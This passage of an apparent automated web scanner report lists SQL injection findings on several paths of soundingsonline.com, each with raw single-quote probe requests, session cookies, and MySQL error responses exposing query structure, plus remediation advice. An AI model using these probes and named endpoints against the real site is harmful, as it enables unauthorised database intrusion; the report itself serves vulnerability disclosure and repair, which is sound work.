Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/tech-talk?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.55. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/used-boat-review?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/used-boat-review?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.56. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /calendar?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /calendar?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.57. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /career-opportunities?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /career-opportunities?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.58. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /columns-blogs?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.59. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /columns-blogs/bay-tripper?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/bay-tripper?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.60. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /columns-blogs/books?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/books?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.61. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /columns-blogs/new-england-fishing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/new-england-fishing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.62. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /columns-blogs/under-way?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/under-way?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.63. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

